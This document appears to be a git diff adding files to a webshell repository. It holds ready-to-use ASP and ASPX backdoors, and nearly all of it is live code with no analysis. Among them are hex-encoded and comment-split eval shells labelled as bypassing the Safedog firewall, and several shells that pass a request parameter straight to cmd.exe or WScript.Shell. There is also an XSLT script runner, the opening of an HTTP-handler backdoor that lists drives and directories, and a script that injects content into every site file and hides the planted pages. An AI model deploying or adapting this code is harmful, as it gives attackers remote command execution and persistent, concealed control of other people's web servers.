+  for(k = 0; k < str.length; k=k+2)
+  {
+    t = ((k+2)/2) % key.length;
+    p = key.substr(t, 1);
+    if (isFinite(str.substr(k, 1)))
+    {
+      q = "0x"+ str.substr(k, 2);
+      s = s + char(int(q)-p);// + "|" + p +"|";
+    }
+    else
+    {
+      q = "0x"+ str.substr(k, 4);
+      s = s + char(int(q)-p);
+      k = k+2;
+    }
+  }
+  return(s);
+   }
+</script>
+<%
+exs(exs(dec("556675766874782F4C75696E5E237E2360","1314"))); 
+%>

asp/bypass_safedog_02.asp

@@ -0,0 +1,6 @@
+<%@ Page Language = Jscript %>
+<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/
+"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+
+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval
+(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>

asp/bypass_safedog_03.asp

@@ -0,0 +1,19 @@
+<%
+Function Writesource(str)
+  Response.write(str)
+End Function
+Function cd(ByVal s, ByVal key)
+    For i = 1 To Len(s) Step 2
+        c = Mid(s, i, 2)
+        k = (i + 1) / 2 Mod Len(key) + 1
+        p = Mid(key, k, 1)
+        If IsNumeric(Mid(s, i, 1)) Then
+            cd = cd & Chr(("&H" & c) - p)
+        Else
+            cd = cd & Chr("&H" & c & Mid(s, i + 2, 2))
+            i = i + 2
+        End If
+    Next
+End Function
+Execute cd("6877656D2B736972786677752B237E232C2A","1314")
+%>

asp/cmd提权马.asp

@@ -0,0 +1,68 @@
+<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
+<%@ import Namespace="System.IO"%>
+<%@ import Namespace="System.Diagnostics"%>
+<%@ import Namespace="System.Data"%>
+<%@ import Namespace="System.Management"%>
+<%@ import Namespace="System.Data.OleDb"%>
+<%@ import Namespace="Microsoft.Win32"%>
+<%@ import Namespace="System.Net.Sockets" %>
+<%@ import Namespace="System.Net" %>
+<%@ import Namespace="System.Web.UI"%>
+<%@ import Namespace="System.Runtime.InteropServices"%>
+<%@ import Namespace="System.DirectoryServices"%>
+<%@ import Namespace="System.ServiceProcess"%>
+<%@ import Namespace="System.Text.RegularExpressions"%>
+<%@ Import Namespace="System.Threading"%>
+<%@ Import Namespace="System.Data.SqlClient"%>
+<%@ import Namespace="Microsoft.VisualBasic"%>
+<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<script runat="server">
+protected void Page_load(object sender,EventArgs e)
+{
+  string ok = Request.QueryString["sb"];
+  string shell= Request.QueryString["shell"];
+  //www.moonsec.com moon
+  Response.Write(shell + ok );
+  Response.Write("<pre>");
+  Response.Write(GetCmd(ok,shell));
+  Response.Write("</pre>");
+}
+
+private string GetCmd(string cmd,string shell)
+{
+  string ok = string.Empty;
+   Process p = new Process();
+            p.StartInfo.FileName = shell;
+            p.StartInfo.UseShellExecute = false;
+            p.StartInfo.RedirectStandardInput = true;
+            p.StartInfo.RedirectStandardOutput = true;
+            p.StartInfo.RedirectStandardError = true;
+            p.StartInfo.CreateNoWindow = true;
+            string strOutput = null;
+            try
+            {
+                p.Start();
+                p.StandardInput.WriteLine(cmd);
+        Response.Write(cmd);
+                p.StandardInput.WriteLine("exit");
+                ok = p.StandardOutput.ReadToEnd();
+                p.WaitForExit();
+                p.Close();
+             }
+            catch (Exception ex)
+             {
+        Response.Write("<pre>");
+        Response.Write(ex);
+        Response.Write("/<pre>");
+                 }
+  return ok;
+}
+</script>
+</head>
+<body>
+</body>
+</html>

asp/good_1.asp

@@ -0,0 +1,614 @@
+<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%><% 
+dim file,content,path,task,paths,paths_str,nn,nnfilename,dpath,htmlpath,htmlpath_,htmlpath_str,addcontent,includefiles,noincludefiles,filetype,hanfiles,recontent,site_root,defaulthtml,defaultreplace,read 
+content=request("content") 
+path=request("path") 
+file=request("file") 
+task=request("task") 
+paths=request("paths") 
+nnfilename=request("nnfilename") 
+htmlpath=request("htmlpath") 
+addcontent=request("addcontent") 
+includefiles=request("includefiles") 
+noincludefiles=request("noincludefiles") 
+filetype=request("filetype") 
+recontent=request("recontent") 
+hanfiles=request("hanfiles") 
+site_root=request("site_root") 
+defaulthtml=request("defaulthtml") 
+defaultreplace=request("defaultreplace") 
+read=request("read") 
+IF site_root="" or site_root=null then 
+        site_root = Server.MapPath("/") 
+End IF 
+
+if task="1" Then 
+        paths_str = split(paths,",") 
+        nn = 0 
+        for i=0 to (ubound(paths_str)) 
+                if IsFloderExist(Server.MapPath("/")&"/"&paths_str(i)) Then 
+                readfile_("/"&paths_str(i)&"/"&nnfilename) 
+                WriteIn Server.MapPath("/")&"/"&paths_str(i)&"/"&nnfilename,content 
+                Response.write "/"&paths_str(i)&"/"&nnfilename&"|" 
+                readfile("/"&paths_str(i)&"/"&nnfilename) 
+                nn = nn +1 
+                end if 
+        Next 
+        if nn=0 Then 
+                dpath = mulu(Server.MapPath("/"),defaulthtml) 
+                CFolder("/"&dpath) 
+                readfile_("/"&dpath&"/"&nnfilename) 
+                WriteIn Server.MapPath("/")&"/"&dpath&"/"&nnfilename,content 
+                Response.write "/"&dpath&"/"&nnfilename&"|" 
+                readfile("/"&dpath&"/"&nnfilename) 
+        end If 
+ElseIf task="2" Then     
+        paths_str = split(paths,",") 
+        nn = 0 
+        for i=0 to (ubound(paths_str)) 
+                if IsFloderExist(Server.MapPath("/")&"/"&paths_str(i)) And nn=0 Then 
+                htmlpath_ = paths_str(i) 
+                nn = nn +1 
+                end if 
+        Next 
+        if nn=0 Then 
+                htmlpath_ = mulu(Server.MapPath("/"),defaulthtml) 
+                if CFolder("/"&htmlpath_)=1 then 
+                        readfolder("/"&htmlpath_) 
+                end if 
+        end If 
+        if request("htmlpath")<>"" Then 
+                htmlpath_str = split(htmlpath,"/") 
+                nn = 0 
+                for i=0 to (ubound(htmlpath_str)) 
+                        htmlpath_ = htmlpath_&"/"&htmlpath_str(i) 
+                        if CFolder("/"&htmlpath_)=1 then 
+                                readfolder("/"&htmlpath_) 
+                        end if 
+                Next 
+        end If 
+        readfile_("/"&htmlpath_&"/"&nnfilename) 
+        content = Replace(content,"SITE_URL","http://"&Request.ServerVariables("SERVER_NAME")&"/"&htmlpath_&"/"&nnfilename) 
+        WriteIn Server.MapPath("/")&"/"&htmlpath_&"/"&nnfilename,content 
+        Response.write "<sbj:url>"&"/"&htmlpath_&"/"&nnfilename&"</sbj:url>" 
+        readfile5("/"&htmlpath_&"/"&nnfilename) 
+
+ElseIf task="3" Then 
+        IF instr(site_root, "|")>0  Then 
+                site_root_str = split(site_root,"|") 
+                nn = 0 
+                for i=0 to (ubound(site_root_str)) 
+                        if IsFloderExist(site_root_str(i)) then 
+                                Bianlireplate site_root_str(i),addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles 
+                        end if 
+                Next 
+        Else 
+                Bianlireplate site_root,addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles 
+        End IF 
+ElseIf task="4" Then 
+        IF instr(site_root, "|")>0  Then 
+                site_root_str = split(site_root,"|") 
+                nn = 0 
+                for i=0 to (ubound(site_root_str)) 
+                        if IsFloderExist(site_root_str(i)) then 
+                                Bianli site_root_str(i) 
+                        end if 
+                Next 
+        Else 
+                Bianli site_root 
+        End IF 
+Else 
+        Response.write "tj,"&" tj" 
+        If  IsObjInstalled("Scripting.FileSystemObject") Then 
+                Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+                set f=fso.Getfile(server.mappath(Request.ServerVariables("SCRIPT_NAME"))) 
+                if f.attributes <> 1 Then 
+                f.attributes = 1 
+                end If 
+                set fso = Nothing 
+        end If 
+end If 
+
+%> 
+
+<% 
+Function IsObjInstalled(strClassString)     
+  On Error Resume Next     
+  IsObjInstalled = False     
+  Err = 0     
+  Dim xTestObj     
+  Set xTestObj = Server.CreateObject(strClassString)     
+  If 0 = Err Then IsObjInstalled = True     
+    Set xTestObj = Nothing     
+    Err = 0     
+  End Function   
+%> 
+
+<% 
+function readfile(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FileExists(Server.MapPath(testfile)) Then   '???????? 
+                set f=fso.Getfile(Server.MapPath(testfile)) 
+                if f.attributes <> 7 Then 
+                f.attributes = 7 
+                end If 
+        end If 
+        set fso = Nothing 
+end Function 
+function readfolder(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FolderExists(Server.MapPath(testfile)) Then   '???????? 
+                set f=fso.getfolder(Server.MapPath(testfile)) 
+                if f.attributes <> 7 Then 
+                f.attributes = 7 
+                end If 
+        end if 
+        set fso = Nothing 
+end Function 
+function readfile_(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FileExists(Server.MapPath(testfile)) Then   '???????? 
+                set f=fso.Getfile(Server.MapPath(testfile)) 
+                if f.attributes <> 0 Then 
+                f.attributes = 0 
+                end If 
+        end if 
+        set fso = Nothing 
+end Function 
+function readfolder_(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FolderExists(Server.MapPath(testfile)) Then   '???????? 
+         set f=fso.getfolder(Server.MapPath(testfile)) 
+                if f.attributes <> 0 Then 
+                f.attributes = 0 
+                end If 
+        end if 
+        set fso = Nothing 
+end Function 
+function readfile5(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FileExists(Server.MapPath(testfile)) Then   '???????? 
+                set f=fso.Getfile(Server.MapPath(testfile)) 
+                if f.attributes <> 5 Then 
+                f.attributes = 5 
+                end If 
+        end If 
+        set fso = Nothing 
+end Function 
+function readfolder5(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FolderExists(Server.MapPath(testfile)) Then   '???????? 
+                set f=fso.getfolder(Server.MapPath(testfile)) 
+                if f.attributes <> 5 Then 
+                f.attributes = 5 
+                end If 
+        end if 
+        set fso = Nothing 
+end Function 
+function readfile6(testfile,attid) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FileExists(Server.MapPath(testfile)) Then   '???????? 
+                set f=fso.Getfile(Server.MapPath(testfile)) 
+                if f.attributes <> attid Then 
+                f.attributes = attid 
+                end If 
+        end If 
+        set fso = Nothing 
+end Function 
+''''''''''''''''''''''''''''''''' 
+function readfile_new(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FileExists(testfile) Then   '???????? 
+                set f=fso.Getfile(testfile) 
+                if f.attributes <> 7 Then 
+                f.attributes = 7 
+                end If 
+        end If 
+        set fso = Nothing 
+end Function 
+function readfolder_new(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FolderExists(testfile) Then   '???????? 
+                set f=fso.getfolder(testfile) 
+                if f.attributes <> 7 Then 
+                f.attributes = 7 
+                end If 
+        end if 
+        set fso = Nothing 
+end Function 
+function readfile__new(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FileExists(testfile) Then   '???????? 
+                set f=fso.Getfile(testfile) 
+                if f.attributes <> 0 Then 
+                f.attributes = 0 
+                end If 
+        end if 
+        set fso = Nothing 
+end Function 
+function readfolder__new(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FolderExists(testfile) Then   '???????? 
+         set f=fso.getfolder(testfile) 
+                if f.attributes <> 0 Then 
+                f.attributes = 0 
+                end If 
+        end if 
+        set fso = Nothing 
+end Function 
+function readfile5_new(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FileExists(testfile) Then   '???????? 
+                set f=fso.Getfile(testfile) 
+                if f.attributes <> 5 Then 
+                f.attributes = 5 
+                end If 
+        end If 
+        set fso = Nothing 
+end Function 
+function readfolder5_new(testfile) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FolderExists(testfile) Then   '???????? 
+                set f=fso.getfolder(testfile) 
+                if f.attributes <> 5 Then 
+                f.attributes = 5 
+                end If 
+        end if 
+        set fso = Nothing 
+end Function 
+function readfile6_new(testfile,attid) 
+        Set fso = Server.CreateObject("S"&"cr"&"ip"&"ti"&"ng.Fi"&"le"&"Sys"&"tem"&"Ob"&"je"&"ct") 
+        If fso.FileExists(testfile) Then   '???????? 
+                set f=fso.Getfile(testfile) 
+                if f.attributes <> attid Then 
+                f.attributes = attid 
+                end If 
+        end If 
+        set fso = Nothing 
+end Function 
+
+%> 
+
+<% 
+  Function mulu(path,defaulthtml)   
+    Set Fso=server.createobject("scripting.filesystemobject")     
+        On Error Resume Next   
+    Set Objfolder=fso.getfolder(path)   
+
+    Set Objsubfolders=objfolder.subfolders   
+
+        Dim mulu_item,iii 
+        mulu_item = "html" 
+        iii = 0 
+    For Each Objsubfolder In Objsubfolders   
+      Nowpath= Objsubfolder.name   
+          mulu_item = Nowpath 
+    Next 
+    IF defaulthtml<>"" then 
+        mulu_item = defaulthtml 
+        End IF 
+        mulu = mulu_item 
+
+    Set Objfolder=nothing   
+    Set Objsubfolders=nothing   
+    Set Fso=nothing   
+  End Function 
+
+  Function Bianli(path)   
+    Set Fso=server.createobject("scripting.filesystemobject")     
+
+    On Error Resume Next   
+    Set Objfolder=fso.getfolder(path)   
+    Set Objsubfolders=objfolder.subfolders   
+    For Each Objsubfolder In Objsubfolders   
+      Nowpath=path + "\" + Objsubfolder.name   
+      Set Objfiles=objsubfolder.files   
+      For Each Objfile In Objfiles   
+      Next   
+      Bianli(nowpath)'??   
+
+    Next   
+    Set Objfolder=nothing   
+    Set Objsubfolders=nothing   
+    Set Fso=nothing   
+  End Function   
+
+    Function Bianlireplate(path,addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles)   
+                Set Fso=server.createobject("scripting.filesystemobject")     
+                On Error Resume Next   
+                Set Objfolder=fso.getfolder(path)   
+                Set Objfiles_1=Objfolder.files 
+                For Each Objfile In Objfiles_1   
+                        ftype = getFileExt(Objfile.name) 
+                        aaa=instr(filetype,"."&ftype&".") 
+                        turet = False 
+                        If includefiles= "" Then 
+                                turet = true 
+                        End If 
+                        If turet Then 
+                        else 
+                                true_a=instr(includefiles,Objfile.name) 
+                                If true_a>0 Then 
+                                        turet = true 
+                                End If 
+                        End If 
+                        IF turet=false then 
+                                IF hanfiles<>"" and Instr(1, hanfiles, ",")  Then 
+                                        set hanfiles_str = split(hanfiles,",") 
+                                        nn = 0 
+                                        for i=0 to (ubound(hanfiles_str)) 
+                                                if instr(Objfile.name,hanfiles_str(i))>1 then 
+                                                        turet = true 
+                                                end if 
+                                        Next 
+                                End IF 
+                        End IF 
+                        if aaa>0 And turet Then 
+                                codepage = checkcode(path&"/"&Objfile.name) 
+                                attid = Objfile.attributes 
+                                readfile__new(path&"/"&Objfile.name) 
+                                set writeBoolean = false 
+                                if codepage="utf-8" Or codepage="unicode" Then 
+                                        newf_content = ReadFromTextFile(path&"/"&Objfile.name,"utf-8") 
+                                        bbb=instr(newf_content,addcontent)                                                                                                                       
+                                        if bbb>0 Then 
+                                                If recontent="" Then 
+                                                        writeBoolean = false 
+                                                Else 
+                                                        newf_content = Replace(newf_content,recontent,addcontent) 
+                                                        writeBoolean = true 
+                                                End If 
+                                        Else 
+                                                If recontent="" Then 
+                                                        newf_content = newf_content&addcontent 
+                                                        writeBoolean = true 
+                                                Else 
+                                                        newf_content = Replace(newf_content,recontent,addcontent) 
+                                                        writeBoolean = true 
+                                                End If 
+                                        end If 
+                                        if writeBoolean = true then 
+                                                WriteIn path&"/"&Objfile.name,newf_content 
+                                                readfile6_new path&"/"&Objfile.name,attid 
+                                                Response.write "<sbj:url>"&path&"/"&Objfile.name&"</sbj:url>"&codepage&chr(13) 
+                                        end IF 
+                                Else 
+                                        newf_content = b(path&"/"&Objfile.name) 
+                                        bbb=instr(1,newf_content,addcontent,1) 
+                                        if bbb>0 Then 
+                                                If recontent="" Then 
+                                                        writeBoolean = false 
+                                                Else 
+                                                        newf_content = Replace(newf_content,recontent,addcontent) 
+                                                        writeBoolean = true 
+                                                End If 
+                                        Else 
+                                                If recontent="" Then 
+                                                        newf_content = newf_content&addcontent 
+                                                        writeBoolean = true 
+                                                Else 
+                                                        newf_content = Replace(newf_content,recontent,addcontent) 
+                                                        writeBoolean = true 
+                                                End If 
+                                        end If 
+                                        if writeBoolean = true then 
+                                                WriteIn1 path&"/"&Objfile.name,newf_content
+                                                readfile6_new path&"/"&Objfile.name,attid 
+                                                Response.write "<sbj:url>"&path&"/"&Objfile.name&"</sbj:url>"&codepage&chr(13) 
+                                        end IF 
+                                end if 
+                        end if 
+                 Next 
+                Set Objsubfolders=objfolder.subfolders   
+                For Each Objsubfolder In Objsubfolders   
+
+                  Nowpath=path + "\" + Objsubfolder.name   
+                  Set Objfiles=objsubfolder.files   
+                  Bianlireplate nowpath,addcontent,recontent,includefiles,noincludefiles,filetype,hanfiles '??   
+
+                Next   
+
+                Set Objfolder=nothing   
+                Set Objsubfolders=nothing   
+                Set Fso=nothing   
+  End Function   
+
+  function checkcode(path) 
+  set objstream=server.createobject("adodb.stream") 
+  objstream.Type=1 
+  objstream.mode=3 
+  objstream.open 
+  objstream.Position=0 
+  objstream.loadfromfile path 
+  bintou=objstream.read(2) 
+  If AscB(MidB(bintou,1,1))=&HEF And AscB(MidB(bintou,2,1))=&HBB Then 
+  checkcode="utf-8" 
+  ElseIf AscB(MidB(bintou,1,1))=&HFF And AscB(MidB(bintou,2,1))=&HFE Then 
+  checkcode="unicode" 
+  Else 
+  checkcode="gb2312" 
+  End If 
+  objstream.close 
+  set objstream=nothing 
+  end function 
+
+  Function getFileExt(sFileName) 
+getFileExt = Mid(sFileName, InstrRev(sFileName, ".") + 1) 
+End Function 
+%> 
+
+<% 
+Function IsFloderExist(strFolderName) 
+SET FSO=Server.CreateObject("Scripting.FileSystemObject") 
+IF(FSO.FolderExists(strFolderName))THEN 
+IsFloderExist = True 
+ELSE 
+IsFloderExist = False 
+END IF 
+SET FSO=NOTHING 
+End Function 
+%> 
+
+<% 
+Function getCode(iCount) ''????????? 
+     Dim arrChar 
+     Dim j,k,strCode 
+     arrChar = "012qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM3456789" 
+     k=Len(arrChar) 
+     Randomize 
+     For i=1 to iCount 
+          j=Int(k * Rnd )+1 
+          strCode = strCode & Mid(arrChar,j,1) 
+     Next 
+     getCode = strCode 
+End Function 
+
+Function Digital(iCount)''????? 
+     Dim arrChar 
+     Dim j,k,strCode 
+     arrChar = "0123456789" 
+     k=Len(arrChar) 
+     Randomize 
+     For i=1 to iCount 
+          j=Int(k * Rnd )+1 
+          strCode = strCode & Mid(arrChar,j,1) 
+     Next 
+     Digital = strCode 
+End Function 
+Function sj_int(ByVal min, ByVal max) ''????? 
+                Randomize(Timer) : sj_int = Int((max - min + 1) * Rnd + min) 
+End Function 
+
+
+Function Rand(ByVal min, ByVal max)   
+                Randomize(Timer) : Rand = Int((max - min + 1) * Rnd + min) 
+End Function 
+%> 
+
+<% 
+function WriteIn(testfile,msg) 
+  'set fs=server.CreateObject("scripting.filesystemobject")   
+  'set thisfile=fs.CreateTextFile(testfile,True,True)   
+  'thisfile.Write(""&msg& "")   
+' thisfile.close   
+  'set fs = nothing 
+  Set stm = CreateObject("Adodb.Stream") 
+    stm.Type = 2 
+    stm.mode = 3 
+    stm.charset = "utf-8" 
+    stm.Open 
+    stm.WriteText msg 
+    stm.SaveToFile testfile, 2 
+    stm.flush 
+    stm.Close 
+    Set stm = Nothing 
+end Function 
+function WriteIn1(testfile,msg) 
+  ' set fs=server.CreateObject("scripting.filesystemobject")   
+  ' set thisfile=fs.CreateTextFile(testfile,True)   
+  ' thisfile.Write(""&msg& "")   
+  ' thisfile.close   
+  ' set fs = nothing 
+  Set stm = CreateObject("Adodb.Stream") 
+    stm.Type = 2 
+    stm.mode = 3 
+    stm.charset = "gb2312" 
+    stm.Open 
+    stm.WriteText msg 
+    stm.SaveToFile testfile, 2 
+    stm.flush 
+    stm.Close 
+    Set stm = Nothing 
+end Function 
+
+function delfile(testfile) 
+  set fs=server.CreateObject("scripting.filesystemobject")   
+  fs.DeleteFile(testfile) 
+  set fs = nothing 
+end function 
+%> 
+
+<% 
+function a(t) 
+        set fs=server.createobject("scripting.filesystemobject") 
+        file=server.mappath(t) 
+        set txt=fs.opentextfile(file,1,true) 
+        if not txt.atendofstream then 
+           a=txt.ReadAll 
+        end if 
+     set fs=nothing 
+     set txt=nothing 
+end Function 
+function b(file) 
+        set fs=server.createobject("scripting.filesystemobject") 
+        set txt=fs.opentextfile(file,1,true) 
+        if not txt.atendofstream then 
+           b=txt.ReadAll 
+        end if 
+     set fs=nothing 
+     set txt=nothing 
+end Function 
+function aa(t) 
+        set fs=server.createobject("scripting.filesystemobject") 
+        file=server.mappath(t) 
+        set txt=fs.opentextfile(file,1,true,-1) 
+        if not txt.atendofstream then 
+           aa=txt.ReadAll 
+        end if 
+     set fs=nothing 
+     set txt=nothing 
+end Function 
+function bb(file) 
+        set fs=server.createobject("scripting.filesystemobject") 
+        set txt=fs.opentextfile(file,1,true,-1) 
+        if not txt.atendofstream then 
+           bb=txt.ReadAll 
+        end if 
+     set fs=nothing 
+     set txt=nothing 
+end function 
+
+Function ReadFromTextFile(file,CharSet) 
+         dim str 
+         set stm=CreateObject("adodb.stream") 
+         stm.Type=2'?????? 
+         stm.mode=3 
+         stm.charset=CharSet 
+         stm.open 
+         stm.loadfromfile file 
+         str=stm.readtext 
+         stm.Close 
+         set stm=nothing 
+ReadFromTextFile=str 
+End Function 
+
+%> 
+
+<% 
+
+Function CFolder(Filepath) 
+  Filepath=server.mappath(Filepath) 
+  Set Fso = Server.CreateObject("Scripting.FileSystemObject") 
+  If Fso.FolderExists(FilePath) Then 
+    CFolder=0 
+  else 
+    Fso.CreateFolder(FilePath) 
+    CFolder=1 
+  end if 
+  Set Fso = Nothing 
+end function 
+
+Function BytesToBstr(body,Cset) 
+dim objstream 
+set objstream = Server.CreateObject("adodb.stream") 
+objstream.Type = 1 
+objstream.Mode =3 
+objstream.Open 
+objstream.Write body 
+objstream.Position = 0 
+objstream.Type = 2 
+objstream.Charset = Cset 
+BytesToBstr = objstream.ReadText 
+objstream.Close 
+set objstream = nothing 
+End Function 
+%>

asp/webshell.asp

@@ -0,0 +1,50 @@
+<!--
+ASP Webshell
+Working on latest IIS 
+Referance :- 
+https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
+http://stackoverflow.com/questions/11501044/i-need-execute-a-command-line-in-a-visual-basic-script
+http://www.w3schools.com/asp/
+-->
+
+
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+Function getCommandOutput(theCommand)
+    Dim objShell, objCmdExec
+    Set objShell = CreateObject("WScript.Shell")
+    Set objCmdExec = objshell.exec(thecommand)
+    getCommandOutput = objCmdExec.StdOut.ReadAll
+end Function
+%>
+
+
+<HTML>
+<BODY>
+<FORM action="" method="GET">
+<input type="text" name="cmd" size=45 value="<%= szCMD %>">
+<input type="submit" value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<%Response.Write(Request.ServerVariables("server_name"))%>
+<p>
+<b>The server's port:</b>
+<%Response.Write(Request.ServerVariables("server_port"))%>
+</p>
+<p>
+<b>The server's software:</b>
+<%Response.Write(Request.ServerVariables("server_software"))%>
+</p>
+<p>
+<b>The server's software:</b>
+<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
+<% szCMD = request("cmd")
+thisDir = getCommandOutput("cmd /c" & szCMD)
+Response.Write(thisDir)%>
+</p>
+<br>
+</BODY>
+</HTML>

asp/xslt.asp

@@ -0,0 +1,9 @@
+<%
+set xmldoc= Server.CreateObject("MSXML2.DOMDocument")
+xml="<?xml version=""1.0""?><root >cmd /c dir</root>"
+xmldoc.loadxml(xml)
+Set xsldoc = Server.CreateObject("MSXML2.DOMDocument")
+xlst="<?xml version='1.0'?><xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh""><msxsl:script language=""JScript"" implements-prefix=""zcg""> function xml(x) {var a=new ActiveXObject('wscript.shell'); var exec=a.Exec(x);return exec.StdOut.ReadAll()+exec.StdErr.ReadAll(); }</msxsl:script><xsl:template match=""/root""> <xsl:value-of select=""zcg:xml(string(.))""/></xsl:template></xsl:stylesheet>"
+xsldoc.loadxml(xlst)
+response.write "<pre><xmp>" & xmldoc.TransformNode(xsldoc)& "</xmp></pre>"
+%>

aspx/abcd.aspx

@@ -0,0 +1,5 @@
+<%@PAGE LANGUAGE=JSCRIPT%>
+<%var PAY:String=
+Request["\x61\x62\x63\x64"];eval
+(PAY,"\x75\x6E\x73\x61"+
+"\x66\x65");%>

aspx/as.ashx

@@ -0,0 +1,26 @@
+<%@ WebHandler Language="C#" Class="Handler2" %>
+using System;
+using System.Collections.Generic; 
+using System.Diagnostics;
+using System.Web;
+public class Handler2 : IHttpHandler {
+public void ProcessRequest (HttpContext context) {
+//string x = "-an";
+string x = context.Request["x"];
+Process prc=new Process(); 
+prc.StartInfo.FileName="cmd.exe"; 
+prc.StartInfo.UseShellExecute=false; 
+prc.StartInfo.RedirectStandardInput = true; 
+prc.StartInfo.RedirectStandardOutput = true; 
+prc.StartInfo.RedirectStandardError = true; 
+prc.StartInfo.CreateNoWindow = false; 
+prc.Start();
+prc.StandardInput.WriteLine(x);
+prc.StandardInput.Close();
+context.Response.Write(prc.StandardOutput.ReadToEnd());
+context.Response.End();}
+public bool IsReusable {
+        get {
+            return false;
+        }
+    }}

aspx/httpHandlers_backdoor/Customize.cs

@@ -0,0 +1,332 @@
+using System;
+using System.Data;
+using System.Configuration;
+using System.Web;
+using System.IO;
+using System.Text;
+using System.Net;
+using System.Diagnostics;
+using System.Data.SqlClient;
+ 
+namespace WooYun
+{
+ 
+    public class Customize
+    {
+ 
+        public static void CP(string S, string D)
+        {
+            if (Directory.Exists(S))
+            {
+                DirectoryInfo m = new DirectoryInfo(S);
+                Directory.CreateDirectory(D);
+                foreach (FileInfo F in m.GetFiles())
+                {
+                    File.Copy(S + "\\" + F.Name, D + "\\" + F.Name);
+                }
+                foreach (DirectoryInfo F in m.GetDirectories())
+                {
+                    CP(S + "\\" + F.Name, D + "\\" + F.Name);
+                }
+            }
+            else
+            {
+                File.Copy(S, D);
+            }
+        }
+ 
+        public static void Request()
+        {
+            HttpContext context = HttpContext.Current;
+            HttpRequest request = context.Request;
+            HttpResponse response = context.Response;
+            string Z = request.Form["023"];
+            if (Z != "")
+            {
+                string Z1 = request.Form["Z1"];
+                string Z2 = request.Form["Z2"];
+                string R = "";
+                try
+                {
+                    switch (Z)
+                    {
+                        case "A":
+                            {
+                                string[] c = Directory.GetLogicalDrives();
+                                R = string.Format("{0}\t", context.Server.MapPath("/"));
+                                for (int i = 0; i < c.Length; i++)
+                                    R += c[i][0] + ":";
+                                break;
+                            }
+                        case "B":
+                            {
+                                DirectoryInfo m = new DirectoryInfo(Z1);
+                                foreach (DirectoryInfo D in m.GetDirectories())
+                                {
+                                    R += string.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
+                                }
